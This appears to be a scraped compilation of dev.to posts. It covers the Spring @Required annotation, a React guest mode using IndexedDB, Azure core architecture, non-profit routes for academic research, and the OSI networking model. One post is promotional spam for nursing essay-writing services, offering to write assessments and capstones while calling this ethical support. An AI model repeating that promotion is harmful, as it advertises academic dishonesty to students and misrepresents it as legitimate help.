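// Sketch: constructor injection makes the dependency mandatory without @Required.
class Employee {
    private final String name;

    Employee(String name) {
        // fail fast if the required dependency is missing,
        // analogous to the BeanInitializationException Spring would throw
        this.name = Objects.requireNonNull(name, "name is required");
    }

    String getName() {
        return name;
    }
}

public class Main {
    public static void main(String[] args) {
        System.out.println(new Employee("John Doe").getName());
        try {
            new Employee(null); // required dependency missing
        } catch (NullPointerException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

In modern Spring, declaring the dependency as a constructor parameter is generally all that's needed, since a bean with a single constructor is autowired automatically.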
## **How Was It Used?**
Assuming we have this bean definition:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
                           http://www.springframework.org/schema/beans/spring-beans.xsd">

    <bean id="employee" class="Employee">
        <property name="name" value="John Doe" />
    </bean>

</beans>
```
And this Java code:
```java
public class Employee {

    private String name;

    @Required
    public void setName(String name) {
        this.name = name;
    }
}
```
The `@Required` checks if the `name` property was set. If it is not, it will throw the exception we mentioned above, when trying to configure this bean.
Now, the next time you work on a legacy project, you'll already be familiar with this annotation.
If you like this topic, make sure to follow me, in the following days, I’ll be explaining more about the Spring annotations!
Stay tuned!
[Willian Moya (@WillianFMoya) / X (twitter.com)](https://twitter.com/WillianFMoya)
[Willian Ferreira Moya | LinkedIn](https://www.linkedin.com/in/willianmoya/)
**References**
- https://www.tutorialspoint.com/spring/spring_required_annotation.htm
- https://www.geeksforgeeks.org/spring-required-annotation-with-example/
- https://docs.spring.io/spring-framework/docs/2.5.6/javadoc-api/org/springframework/beans/factory/annotation/Required.html | tiuwill |
1,774,014 | I had to create a Guest Mode mechanism in React.JS | Introducing As usual, in all of my previous projects I had to use some auth provider to do... | 0 | 2024-06-06T21:34:22 | https://dev.to/pvinicius/i-had-to-create-a-guest-mode-mechanism-in-reactjs-5abf | webdev, beginners, react, learning | ## Introducing
As usual, in all of my previous projects I used an auth provider for the authentication mechanism, but this case was different: besides the usual auth-provider flow, I had to create a guest mode mechanism.
## My Use Case
If you are a logged-in user you can save many projects in the app, but a guest user can save only one project. Also, if a guest user logs in, their project can be stored in the DB.
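The guest-mode rule described above can be sketched like this. The names are hypothetical and the storage is simplified to an in-memory array; in the real app this data lives in IndexedDB:

```javascript
// Sketch of the guest-mode rule: guests keep at most one project locally;
// on login, everything is handed to the backend and the local copy is cleared.
class GuestProjectStore {
  constructor(limit = 1) {
    this.limit = limit;
    this.projects = []; // stands in for the IndexedDB table
  }

  add(project) {
    if (this.projects.length >= this.limit) {
      throw new Error(`Guest mode allows only ${this.limit} project(s)`);
    }
    this.projects.push(project);
    return project;
  }

  // When the guest logs in, persist each local project and clear the guest data.
  migrateTo(saveToDb) {
    const saved = this.projects.map(saveToDb);
    this.projects = [];
    return saved;
  }
}

const store = new GuestProjectStore();
store.add({ name: "my first project" });

try {
  store.add({ name: "one too many" }); // guests get a single slot
} catch (err) {
  console.log(err.message);
}
```

On login, `migrateTo` receives whatever function persists projects in the backend, so the guest's work is not lost.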
## What solution did I apply?
I chose IndexedDB to store all guest-user data in the browser, and I relied on [Dexie](https://dexie.org/docs/Tutorial/React) to help me.
Basically, I created a hook that instantiates my IndexedDB database and exposes all the methods like add, update, and remove, so I can use it anywhere.

The nice thing is that all data can be deleted, either by the user or programmatically. This is amazing :)
| pvinicius |
1,879,672 | Elevating Your Nursing Journey: The Role of BSN Writing Services | Elevating Your Nursing Journey: The Role of BSN Writing Services As you embark on your educational... | 0 | 2024-06-06T21:31:20 | https://dev.to/carlo34/elevating-your-nursing-journey-the-role-of-bsn-writing-services-k0n | **Elevating Your Nursing Journey: The Role of BSN Writing Services**
As you embark on your educational journey towards a Bachelor of Science in Nursing (BSN), you're likely to encounter various challenges along the way. From mastering complex medical concepts to balancing clinical rotations and academic coursework, the path to becoming a registered nurse requires dedication, perseverance, and a commitment to excellence. One area where many nursing students find themselves seeking assistance ([take my online nursing class](https://bsnwritingservices.com/)) is academic writing. Fortunately, BSN writing services are available to provide the support and guidance you need to succeed in your studies. In this comprehensive guide, we'll explore the importance of academic writing in nursing education, the types of services offered by BSN writing companies, the benefits of utilizing these services, and ethical considerations to keep in mind.
### Importance of Academic Writing in Nursing Education
Academic writing plays a crucial role in nursing education for several reasons:
#### 1. Critical Thinking and Analytical Skills Development
Writing essays, research papers, and case studies requires you to analyze information, evaluate evidence, and formulate coherent arguments. These activities help develop critical thinking and analytical skills essential for clinical practice.
#### 2. Preparation for Evidence-Based Practice (EBP)
Nursing is grounded in evidence-based practice (EBP), which involves integrating the best available evidence with clinical expertise and patient preferences. Engaging in academic writing teaches you how to critically appraise research literature, identify gaps in knowledge, and apply evidence to inform decision-making in healthcare settings.
#### 3. Professional Communication Enhancement
Clear and effective communication is essential in nursing practice. Academic writing helps you refine your communication skills, allowing you to convey complex medical information accurately and professionally. This skill is invaluable for documenting patient care, collaborating with interdisciplinary teams, and educating patients and their families ([capella 4030 assessment 3](https://bsnwritingservices.com/capella-4030-assessment-3/)).
### Types of BSN Writing Services
BSN writing services offer a range of assistance tailored to meet your specific needs:
#### 1. Essay Writing Assistance
Whether it's a reflective essay on a clinical experience or an analytical essay on nursing theories, BSN writing services can help you craft well-researched and logically structured essays that meet academic standards.
#### 2. Research Paper Support
Research papers are a fundamental aspect of nursing education. BSN writing services provide guidance throughout the research process, from formulating research questions to presenting findings in a coherent manner.
#### 3. Case Study Analysis
Analyzing case studies is an effective way to apply theoretical knowledge to real-world clinical scenarios. BSN writing services assist you in identifying key issues, developing evidence-based care plans, and synthesizing information to make informed decisions.
#### 4. Coursework Assistance
From anatomy and physiology to pharmacology and nursing ethics, BSN coursework covers a wide range of topics. BSN writing services offer customized assistance with coursework assignments, ensuring that you submit accurate and well-written work.
#### 5. Capstone Project Guidance
The capstone project is a culmination of your nursing education ([capella 4900 assessment 5](https://bsnwritingservices.com/capella-4900-assessment-5/)), allowing you to integrate knowledge and skills into a comprehensive project addressing a significant healthcare issue. BSN writing services provide mentorship and support throughout the capstone project process, helping you develop research proposals, collect and analyze data, and write final reports.
### Benefits of Utilizing BSN Writing Services
Utilizing BSN writing services offers numerous benefits:
#### 1. Academic Support and Guidance
BSN writing services provide personalized assistance tailored to your individual needs, helping you navigate the complexities of academic writing and research.
#### 2. Time Management and Work-Life Balance
By alleviating some of the academic workload, BSN writing services help you manage your time more effectively, allowing you to focus on clinical training and maintain a healthy work-life balance.
#### 3. Improved Academic Performance
By providing well-researched and professionally written assignments, BSN writing services contribute to improved academic performance, leading to higher grades and a deeper understanding of nursing concepts.
#### 4. Stress Reduction
The pressure to excel academically can be stressful. BSN writing services alleviate some of this stress by providing the support you need to succeed academically, allowing you to focus on other aspects of your education and personal life.
#### 5. Enhanced Professional Development
Effective communication and critical thinking skills are essential for success in nursing practice ([capella 4060 assessment 4](https://bsnwritingservices.com/capella-4060-assessment-4/)). By honing these skills through academic writing, you develop the foundation for lifelong learning and professional growth.
### Ethical Considerations
While BSN writing services offer valuable support, it's essential to use them ethically:
- View BSN writing services as supplements to your learning and academic development, rather than shortcuts to academic success.
- Ensure all work submitted is original and properly cited to avoid plagiarism.
- Engage actively with the writing process and incorporate feedback to improve writing skills.
- Respect academic integrity and the intellectual property rights of others.
### Choosing the Right BSN Writing Service
When selecting a BSN writing service, consider the following factors:
- Qualifications and expertise of the service's writers.
- Range of services offered, including essay writing, research paper assistance, and capstone project guidance.
- Reputation for quality, reliability, and customer satisfaction, as evidenced by reviews and testimonials from other nursing students.
- Commitment to confidentiality and ethical conduct, including policies regarding plagiarism and academic integrity.
- Level of communication and support provided, including responsiveness to inquiries and willingness to accommodate revisions.
### Conclusion
In conclusion, BSN writing services play a vital role in supporting nursing students throughout their educational journey. By offering personalized assistance with academic writing and research, these services empower students to develop essential skills for success in nursing practice. From essay writing to capstone project guidance, BSN writing services provide invaluable support that enhances academic performance, reduces stress, and promotes professional development. However, it's essential to use these services ethically, respecting academic integrity and viewing them as supplements to your learning process. By choosing the right BSN writing service and engaging actively with the writing process, you can elevate your nursing education and prepare yourself for a rewarding career in healthcare.
Let's delve deeper into some of the specific benefits of utilizing BSN writing services, as well as explore additional considerations for selecting the right service provider.
### More Benefits of Utilizing BSN Writing Services
#### 6. Access to Expertise
BSN writing services employ writers with backgrounds in nursing and academic writing. These experts understand the nuances of nursing education and are well-versed in the expectations of academic institutions. By accessing their expertise, students can ensure that their assignments are of high quality and meet the standards required for academic success.
#### 7. Customized Assistance
One of the key advantages of BSN writing services is their ability to provide customized assistance tailored to the unique needs of each student. Whether you require help with a specific aspect of an assignment or comprehensive support throughout the entire writing process, these services can adapt to your requirements and provide the level of assistance you need.
#### 8. Confidence Boost
Navigating the demands of a BSN program can be challenging, and academic writing assignments can often feel overwhelming. BSN writing services provide students with the support and guidance they need to tackle these assignments with confidence. Knowing that they have access to professional assistance can alleviate anxiety and empower students to excel academically.
#### 9. Time Savings
Balancing coursework, clinical rotations, and personal commitments can leave little time for academic writing. BSN writing services help students save time by handling some of the writing workload. This allows students to focus their time and energy on other aspects of their education and personal lives, ultimately promoting a better work-life balance.
#### 10. Networking Opportunities
Some BSN writing services may offer opportunities for networking and collaboration with other nursing students. Through online forums, discussion groups, or workshops, students can connect with peers, share experiences, and learn from one another. These networking opportunities can enhance the overall educational experience and foster a sense of community among students.
### Additional Considerations for Choosing the Right BSN Writing Service
#### 1. Pricing Structure
Consider the pricing structure of the BSN writing service and ensure it aligns with your budget. Look for transparent pricing policies that clearly outline the cost of services and any additional fees. Be wary of services that offer significantly lower prices than others, as this may indicate a lack of quality or reliability.
#### 2. Samples and Portfolio
Before choosing a BSN writing service, review samples of their work or ask for a portfolio of past assignments they have completed. This will give you an idea of the quality of their writing and whether it meets your expectations. Look for evidence of thorough research, clear writing, and proper formatting in the samples provided.
#### 3. Revision Policy
Check the revision policy of the BSN writing service to ensure they offer revisions if needed. It's essential to have the option to request revisions if you are not satisfied with the final product or if any changes are required. Ideally, the service should offer a reasonable number of revisions at no additional cost.
#### 4. Customer Support
Evaluate the level of customer support provided by the BSN writing service. Look for services that offer responsive customer support channels, such as email, phone, or live chat. Prompt and helpful customer support can make a significant difference in your experience with the service.
#### 5. Guarantees
Review any guarantees offered by the BSN writing service, such as satisfaction guarantees or money-back guarantees. These guarantees provide reassurance that you will receive quality work and that your satisfaction is a priority for the service provider.
### Conclusion
BSN writing services offer numerous benefits to nursing students, including access to expertise, customized assistance, confidence boost, time savings, and networking opportunities. When choosing a BSN writing service, consider factors such as pricing structure, samples/portfolio, revision policy, customer support, and guarantees. By selecting the right BSN writing service and leveraging their support effectively, you can enhance your academic performance, reduce stress, and maximize your success in your nursing education journey. | carlo34 | |
1,879,641 | Mastering the core components of Azure architecture | MICROSOFT AZURE CORE ARCHITECTURAL COMPONENTS Microsoft Azure is built on a few key... | 0 | 2024-06-06T21:31:14 | https://dev.to/adah_okwara_3c43c95a89a2e/understanding-the-core-architectural-components-of-azure-26me | azure, cloudcomputing, architecture, microsoftcloud | ## MICROSOFT AZURE CORE ARCHITECTURAL COMPONENTS
Microsoft Azure is built on a few key elements that help keep your services running smoothly and reliably. The main components include Azure regions, Azure Availability Zones, resource groups, and the Azure Resource Manager. In this blog, we will explore what each of these components does and how they work together to provide high availability and redundancy.
**AZURE REGIONS**
Azure regions are groups of data centers located within a specific geographic area, connected by a high-speed, low-latency network. These regions help ensure data sovereignty, compliance, and resiliency. Currently, Azure has 42 regions worldwide, with 12 more planned for the future.
**AZURE AVAILABILITY ZONES**
Azure Availability Zones are designed to protect your applications and data from data center failures. Each Availability Zone is a distinct physical location within an Azure region, and each zone has its own independent power, cooling, and networking infrastructure.
Imagine you have a house with different rooms, and each room has its own power source, air conditioning, and internet connection. Now, let's say you have some very important gadgets in your house that you absolutely can't afford to lose or have go offline, like your computer or your TV.
Azure Availability Zones are like having three identical houses next to each other, but each house is designed so that if something goes wrong in one house, like a power outage or internet trouble, the other two houses keep working just fine. In each house, there are different areas (like rooms) that are set up in such a way that if one area has a problem, the rest of the house can still operate smoothly.
When you put your important gadgets in these three houses (Azure Virtual Machines in different Availability Zones), you're making sure they are spread out so that if something goes wrong in one area or one entire house, the others keep running without any interruption. This way, you're protecting your gadgets from any issues that might happen in a single house or area.
Azure promises that if you use these Availability Zones, your gadgets will be up and running 99.99% of the time, which is really reliable and helps keep everything working smoothly even if something unexpected happens.
**RESOURCE GROUPS IN AZURE**
A resource group is a logical container for Azure resources.
Imagine resource groups in Azure as organized digital containers, like labeled boxes, where you neatly keep your online stuff. Just as you might pack all your kitchen items in one box when moving, you can group related Azure resources together in a resource group.
For example, if you have a website and a database that goes with it, you'd put both of them in the same resource group. This makes it easier to manage costs, simplifies resource management and organization, and helps with management and deployment tasks.
**Here are some key benefits of using resource groups:**
- **Easier Cost Management:** By grouping resources in a resource group, you can track and manage costs more efficiently. It's like having a separate budget for each labeled box, making it clear what you're spending on each part of your Azure solution.
- **Simplified Resource Management & Organization:** Resource groups help you keep things tidy and organized. You can easily see which resources are related to which part of your project, making it simpler to manage and keep track of everything.
- **Simplified Management & Deployment:** When it's time to manage or deploy resources, having them grouped in resource groups makes the process smoother. You can apply changes or updates to a whole group at once, rather than dealing with each resource individually.
- **Grouping by Application, Environment, or Department:** Resource groups are flexible, allowing you to group resources based on your needs. Whether it's by application (like putting all components of your web app together), environment (like separating resources for development and production), or department (like grouping resources used by different teams), resource groups make it easy to organize things according to your project's structure.
So, think of resource groups as your digital storage solution that not only keeps your online stuff organized but also makes managing, deploying, and budgeting for your Azure resources a whole lot simpler.
**AZURE RESOURCE MANAGER (ARM)**
Imagine Azure as a bustling city with different buildings and services, and your application deployed in Azure is like a complex building with various parts - virtual machines, storage, a web app, and a database. These parts work together to make your application run smoothly, just like how different components in a building work together.
Now, think of Azure Resource Manager as the city planner or manager. It's the tool that helps you oversee and manage all these parts of your application as if you were managing a whole building complex.
**Benefits:**
- **Deployment and Management:** With Azure Resource Manager, you can deploy, update, and manage all the parts of your application at once. It's like taking care of everything in your building complex in one go, from construction to maintenance.
- **Templates for Easy Deployment:** Resource Manager provides templates that make deploying your application easier. These templates are like ready-made plans that ensure everything is set up correctly, just like how you'd use a blueprint to build a house.
- **Consistent Management and Security:** Resource Manager gives you a consistent way to manage all your resources in Azure. It also helps keep your resources secure with features like Role-Based Access Control (RBAC), which is like having keys to different areas of your building complex for different people.
- **Tagging for Organization:** You can use tagging features to organize and keep track of your resources. It's like putting labels on different parts of your building complex so you can find and manage them easily.
So, Azure Resource Manager is like your digital city manager, helping you keep everything organized, secure, and running smoothly in your Azure "city."
In essence, Azure's core architectural components form the backbone of a robust and scalable cloud infrastructure. From virtual machines and storage accounts to web apps and databases, each component plays a vital role in creating and maintaining modern cloud-based solutions.
And just as a city planner organizes and manages a city, Azure Resource Manager brings all these components together seamlessly. It's like having a superhero overseeing your digital city, making sure everything runs smoothly and securely.
By leveraging these foundational elements, businesses can build resilient and efficient applications in the cloud, empowering innovation and growth in today's digital landscape.
| adah_okwara_3c43c95a89a2e |
1,879,607 | So I Built This: Broadening the Impact of What You’ve Built in the Lab | How the non-profit, foundation model may be your solution to the challenge of broadening the impact... | 0 | 2024-06-06T21:24:43 | https://medium.com/@jasoncorso/so-i-built-this-broadening-the-impact-of-what-youve-built-in-the-lab-31a5e591713d | computervision, ai, machinelearning, datascience | How the non-profit, foundation model may be your solution to the challenge of broadening the impact of your research

<center>_So I Built This discusses how to align your actions with your interests when considering different ways to broaden the impact of your academic research. Image generated by DALL-E._</center>
In recent months, I’ve noticed a trend: colleagues approaching me with an eerily similar question that taps into a larger issue facing academics and innovators alike:
> “So, I built this. It’s gotten really excellent early feedback. I want to bring it to more people, what should I do?”
Now, believe me, I’m both an academic and a startup founder-operator, I have some pretty interesting colleagues. So when one begins with “So I built this,” I give them my attention. What they’ve built is almost certainly state-of-the-art in some capacity. And they’ve each observed its value when used in their early user testing.
In each case, of course, my colleagues shared details about what they had built and their ideas on what they could do next. But, those details don’t matter greatly, and I want to respect the privacy of the individuals who came to me. I do believe in all of these encounters there was genuine interest in broadening the impact of what they built.
Below, I’ll break down these conversations into key questions and responses, offering insights on whether to start a company, apply for a grant, or consider a non-profit foundation for broadening the impact of such an innovation.
Interestingly, in these discussions, it turned out that my colleagues really did not have much interest in building a startup company. They sincerely wanted to see their work adopted. But, they ultimately were less committed to the daunting prospect of building a startup, a roller coaster ride of challenges that is neither for the lighthearted, nor in alignment with the classical performance indicators of academics. This led us to focus on the idea of creating a non-profit or foundation to support broader adoption.
## Should I start a company for this?
Essentially, no matter how steeped in the academic world these folks are, they understand that startups and university spinouts are a natural option for academics to bring the fruits of their labor to a broader user base. However, actually operating a company means work that likely none of these folks or their team members were trained for or had a particular interest in doing. This is intellectually stimulating work like building a go-to-market strategy and evaluating product-market fit, and it is operations labor like managing a payroll provider, etc. And this is not even getting close to the work required for getting funding from seed or venture investors, which itself takes significant effort.
After talking about this with each of my inquiring colleagues, it became increasingly clear that although they had passion for their innovation, they did not necessarily have passion for building a company to bring it to market. In each case, we tended to leave this part of the discussion at some form of: “if you are really going to consider starting a company for this, then you need to ensure that you are fully committed to its success.” Starting a company is no small task.
Oddly, we talked about finding other people to actually start the company for them, which is a classical way of approaching this problem for academics. Yet, none seemed willing to hand over the control, which would ultimately be necessary.
## Should I apply for an SBIR?
Inevitably, being academics, we also talked about applying for a grant to fund the work of broadening adoption. Most federal funding agencies in the US have a [Small Business Innovation Research (SBIR)](https://www.sbir.gov/) grant program that aims to stimulate technological innovation by funding small businesses to help commercialize their innovations, thereby fostering economic growth and addressing specific governmental needs. While the program’s aim of stimulating innovation is important, it’s not obvious to me that it’s a match for this case.
First, you began the conversation telling me you’ve already built something worthwhile. As far as I know, the SBIR program is for yet-to-be-built extensions of your innovation that you may or may not have much interest in.
Second, I’ve seen numerous cases over the years where someone starts a company funded by an SBIR with the intention of building a business. However, the lifecycle of one SBIR turns out to be insufficient to actually bootstrap the business. So, the founders then need to secure further funding. They could try to go to seed or venture funding. But, this would be a challenge. Although the SBIR grant mentions an emphasis on a business plan, it seems rare that actual customer outreach and product-market fit are established during the work of a typical SBIR.
These academic founders would need to emphasize the other half of the startup — building the actual business — which is a muscle not frequently developed during the grant period.
This makes it difficult to convince investors, especially given the time already invested in the company. Instead, the much easier thing to do is apply for another SBIR, laying the groundwork for what are commonly called “SBIR shops,” i.e., small businesses whose primary go-to-market approach is funding through SBIR programs, rarely turning anything into an actual commercial product.
Third, the principle of the SBIR grant is to, in good faith, actually attempt to start a business based on the technology you develop in the grant. It is not free money; in fact, it is tax-payer money marked for stimulating technological innovation in new small businesses. Is this something you really want to do? As I said above, it is not a decision to be taken lightly.
## Have you considered a non-profit or a foundation?
While my colleagues and I explored various options for their business endeavors, such as licensing their innovation to another company, our conversations consistently gravitated towards a different model that seemed to better fit the needs and goals of academic innovators. Since these individuals did not want to focus on the work of building a startup company, the route to a non-profit or foundation seemed more appropriate. This route would enable them to maintain a mission-driven focus emphasizing the adoption and impact of their innovation irrespective of the commercial viability.
The [Embodied AI Foundation](https://www.embodiedaifoundation.org/) is probably the first place I learned about this different style of broadening adoption of technical work. It supports the highly popular open source CARLA autonomous driving simulator, for example. This model is, however, becoming more popular. I find it popping up in numerous ways to support various innovations. For example, the [Common Visual Data Foundation](http://www.cvdfoundation.org/) was created to provide long-term support for the wildly popular [Common Objects in Context (COCO) dataset](https://cocodataset.org/#home) in computer vision.
While this may be an attractive model that lets the academic achieve their impact goals without the challenges inherent in creating a for-profit entity, it is not without its own risks. The two biggest being funding and operations. How will you fund the effort? This may indeed mean grant programs like those above, but it also unlocks different types of money that emphasize such non-profits as long as your mission is in alignment with those of the money source. Operationally, at least once the effort grows, you likely still need to find someone to help you run the entity. Yet, these challenges seem to me to be a heck of a lot easier than the challenges of starting a for-profit entity.
## Closing
In conclusion, while the allure of a grant- or venture-backed startup company might initially seem like the most direct route to broadening the impact of what you’ve built, it’s essential to consider alternative models that align better with your goals and resources. The non-profit or foundation route offers a mission-driven approach that prioritizes adoption and societal impact over commercial gain, mitigating many of the operational burdens and risks associated with for-profit ventures. As we’ve discussed, it’s not without its challenges, particularly in funding and management, but it offers a viable path for academics passionate about their creations yet hesitant to embark on the startup rollercoaster. By focusing on your mission and leveraging the support of grants and philanthropic funding, you can achieve a broader and more sustainable impact with your innovation.
### Acknowledgments
Thank you to my colleague Michelle Brinich for reviewing and editing this blog.
### Biography
Jason Corso is Professor of Robotics, Electrical Engineering and Computer Science at the University of Michigan and Co-Founder / Chief Science Officer of the AI startup Voxel51. He received his PhD and MSE degrees at Johns Hopkins University in 2005 and 2002, respectively, and a BS Degree with honors from Loyola University Maryland in 2000, all in Computer Science. He is the recipient of the University of Michigan EECS Outstanding Achievement Award 2018, Google Faculty Research Award 2015, Army Research Office Young Investigator Award 2010, National Science Foundation CAREER award 2009, SUNY Buffalo Young Investigator Award 2011, a member of the 2009 DARPA Computer Science Study Group, and a recipient of the Link Foundation Fellowship in Advanced Simulation and Training 2003. Corso has authored more than 150 peer-reviewed papers and hundreds of thousands of lines of open-source code on topics of his interest including computer vision, robotics, data science, and general computing. He is a member of the AAAI, ACM, MAA and a senior member of the IEEE.
### Disclaimer
This article is provided for informational purposes only. It is not to be taken as legal or other advice in any way. The views expressed are those of the author only and not his employer or any other institution. The author does not assume and hereby disclaims any liability to any party for any loss, damage, or disruption caused by the content, errors, or omissions, whether such errors or omissions result from accident, negligence, or any other cause.
### Copyright 2024 by Jason J. Corso. All Rights Reserved.
No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to the publisher via direct message on X/Twitter at _JasonCorso_.
| jasoncorso |
1,879,671 | Data journey through the Internet - The OSI model approach | These last couple of years have seen the Internet become such a staple tool in humanity that it is... | 0 | 2024-06-06T21:22:41 | https://dev.to/amaraiheanacho/data-journey-through-the-internet-the-osi-model-approach-1n4a | networking, osimodel, internet, data | These last couple of years have seen the Internet become such a staple tool in humanity that it is hard to imagine a world without it, let alone imagine that most of human history and advancements happened without it.
But the Internet, as mystical as it seems, can simply be explained as a large network connecting countless diverse computers and devices, all looking to communicate with each other. Although these devices operate under different protocols, use different data formats, and use different addressing schemes, they can all exchange data seamlessly due to the standardization offered by the OSI model.
This article gets into what exactly the OSI model is and how it is used to send data through the internet.
## What is the OSI model?
The [Open Systems Interconnection (OSI)](https://aws.amazon.com/what-is/osi-model/) model, developed by the [International Organization for Standardization (ISO)](https://www.iso.org/) in 1984, acts as a blueprint for network communication. It breaks down communication between computer systems into seven layers: Physical, Data Link, Network, Transport, Session, Presentation, and Application.

*The OSI model layers, image from Cloudflare*
But before getting right into this article, it is important to note that while this article focuses on the OSI model, published in 1984, you must acknowledge that how you communicate over the Internet has evolved since then.
Today’s Internet uses a slightly altered OSI model called the [Transmission Control Protocol/Internet Protocol (TCP/IP)](https://www.avast.com/c-what-is-tcp-ip#:~:text=What%20does%20TCP%2FIP%20stand,network%20such%20as%20the%20internet.).
This TCP/IP model streamlines things by combining the top three OSI layers (Application, Presentation, and Session) into a single Application layer. It also merges the Data Link and Physical layers into a Network Access layer. In simpler terms, the TCP/IP model has four layers: Network Access, Internet, Transport, and Application.

Now, this streamlining does not mean that the tasks done by the Presentation Layer and the Session Layer are unimportant in this internet age; they just work a bit differently, and the next couple of sections will discuss this. The rest of the article will discuss the layers that make up the OSI model and the roles they play in network communication.
## The OSI model layers
The OSI model is split into seven layers, and these layers are:
**Physical Layer (Layer 1):**
The physical layer is the foundation of data communication in the OSI model, defining the hardware elements involved in the network. This layer handles the transmission and reception of raw bitstreams (1s and 0s) that make up digital information. Its primary function is to transmit this data stream over physical media like cables (coaxial, fiber optic) or wireless signals (Wi-Fi). Depending on the medium, the physical layer converts the data into electrical signals for cables or radio waves for wireless transmission.
**Data Link Layer (Layer 2):**
The data link layer is responsible for error-free data transfer between nodes within the same network via the physical layer. A better way to understand this is:
Hosts - devices on a network that send, receive, and process data, such as computers, servers, and smartphones - use an addressing scheme called [Internet Protocol(IP) addresses](https://www.fortinet.com/resources/cyberglossary/what-is-ip-address#:~:text=An%20Internet%20Protocol%20(IP)%20address,use%20the%20internet%20to%20communicate.) to identify each other; the layer 3 section will describe this phenomenon in more detail.
These IP addresses act like unique mailing addresses on the network, allowing hosts to send information to each other.
However, as with some deliveries, the information doesn't travel from the sending host to the receiving host in a single one-way trip. There are helpers along the way that forward it from one hop to the next until it reaches the host with the destination IP address.
And that’s where the data link layer comes in.
**Addressing and Devices:**
The data link layer utilizes a unique addressing scheme called the [Media Access Control (MAC) addresses](https://www.techtarget.com/searchnetworking/definition/MAC-address). These addresses are 48 bits long and typically displayed as a 12-digit hexadecimal number, like 00:1E:67:E4:CB:32. Every [Network Interface Card (NIC)](https://www.tutorialspoint.com/what-is-network-interface-card-nic) has a unique, pre-assigned MAC address.
Now, you might wonder how data actually gets from one device to another on the same network. This is where switches come in.
Switches act as traffic directors within a network. They connect multiple devices to their various ports. To facilitate efficient data sharing, switches maintain MAC address tables that map specific ports to the corresponding MAC addresses of the devices connected to them.
To populate these MAC address tables, switches use a learn, flood, and forward method:
- **Learn:** Whenever a host sends data over the network, it adds a header to the data that holds the source and destination IP addresses and MAC addresses, so that network devices know where to send the data.
So when a switch receives a data packet, it examines the source MAC address in the frame header and the port on which it arrived. It then updates the MAC address table to associate this MAC address with that specific port. This way, the switch learns the location of devices on the network as they communicate.
- **Flood (if necessary):** If the destination MAC address for the incoming frame isn't found in the table, the switch can't determine the recipient's location. In this case, the switch may flood the data frame out of all ports except the one it arrived on. This ensures that the frame reaches the intended recipient, even if the switch hasn't yet learned the destination address. While flooding seems inefficient, it's a temporary measure until the switch learns the proper route.
- **Forward:** Once the switch learns the destination MAC address and its port (either from the initial frame or a response), it can efficiently forward future frames for that device to the correct port.
In summary, the data link layer facilitates hop-to-hop delivery. It does this with the help of an addressing scheme called MAC address and a layer 2 device called switches. Switches learn what MAC addresses are connected to specific ports using the learn, flood, and forward technique.
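The learn/flood/forward behavior described above can be sketched in a few lines of Python. This is a simulation of the logic only: the port numbers and MAC addresses are invented for illustration, and real switches implement this in hardware.

```python
# Minimal sketch of a layer-2 switch's learn/flood/forward logic.
# Ports and MAC addresses here are made-up example values.

class Switch:
    def __init__(self, ports):
        self.ports = ports          # e.g. [1, 2, 3]
        self.mac_table = {}         # MAC address -> port

    def receive(self, frame, in_port):
        # Learn: remember which port the source MAC lives on.
        self.mac_table[frame["src_mac"]] = in_port

        # Forward if the destination is known, otherwise flood.
        out_port = self.mac_table.get(frame["dst_mac"])
        if out_port is not None:
            return [out_port]       # forward out exactly one port
        # Flood: every port except the one the frame arrived on.
        return [p for p in self.ports if p != in_port]

switch = Switch(ports=[1, 2, 3])
# Host A (port 1) sends to an unknown host B: the frame is flooded.
print(switch.receive({"src_mac": "AA", "dst_mac": "BB"}, in_port=1))  # [2, 3]
# Host B replies from port 2; the switch learned A's port, so it forwards.
print(switch.receive({"src_mac": "BB", "dst_mac": "AA"}, in_port=2))  # [1]
```

Notice how the very first reply is enough for the switch to stop flooding: after one exchange, both hosts' MAC addresses are in the table.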
Now that this article has explained how data travels hop-by-hop within a local network, how does the internet ensure these hops ultimately lead to the correct final destination, potentially located far away? And how do network devices choose the most efficient route for these hops?
That's where the network layer comes in. It plays a crucial role in directing data packets across the ocean of networks, which is the Internet.
**Network Layer (Layer 3)**
The next layer in the OSI model is the Network Layer. This layer is responsible for ensuring end-to-end delivery of data between devices. It achieves this by using a unique addressing system called an IP address.
An IP address is a 32-bit number, typically written in four sections (octets) separated by periods. Each section ranges from 0 to 255. An example of an IP address is 192.168.1.1.
The Network Layer uses the receiving device's IP address to determine its location. Using this IP address, the network layer can determine if the target device is on the same local network (like your home network) or a different network somewhere on the Internet. This ability to identify network location relies on a technique called [subnetting](https://www.solarwinds.com/resources/it-glossary/subnetting).
Knowing the target network allows the Network Layer to choose the most efficient way to send data:
- **Same Network:** If the target device is on the same local network, the data is sent directly using a switch.
- **Different Network:** If the target device is on a different network, the data is sent through a switch first. The switch then forwards the data to a router. [Routers](https://www.cloudflare.com/learning/network-layer/what-is-a-router/#:~:text=is%20a%20router%3F-,A%20router%20is%20a%20device%20that%20connects%20two%20or%20more,use%20the%20same%20Internet%20connection.) are responsible for directing data across different networks, ultimately reaching the target device on the internet.
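The same-network decision described above can be sketched with Python's standard `ipaddress` module. The IP addresses and subnet mask below are arbitrary example values from a private (RFC 1918) range.

```python
import ipaddress

# Sketch: how a host uses its subnet mask to decide whether a
# destination is on the local network or must be sent to the router.

def same_network(my_ip, my_mask, dst_ip):
    # strict=False lets us build the network from a host address.
    local = ipaddress.ip_network(f"{my_ip}/{my_mask}", strict=False)
    return ipaddress.ip_address(dst_ip) in local

# A host at 192.168.1.10 with mask 255.255.255.0 (a /24 network):
print(same_network("192.168.1.10", "255.255.255.0", "192.168.1.20"))  # True
print(same_network("192.168.1.10", "255.255.255.0", "8.8.8.8"))       # False
```

When `same_network` returns `False`, the host addresses the frame to its default gateway's MAC address, and the router takes it from there.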
**Understanding Routers and ARP**
Routers act as intermediaries that connect different networks. They're similar to traditional hosts in that they have both IP and MAC addresses. However, unlike hosts, routers use this information specifically to route data packets to their intended destinations on the network.
To send data over a network, you need two types of addresses: the IP and MAC addresses. Finding the IP address is relatively easy; for a traditional host, you can obtain the IP address using systems like the [Domain Name System (DNS)](https://www.cloudflare.com/learning/dns/what-is-dns/).
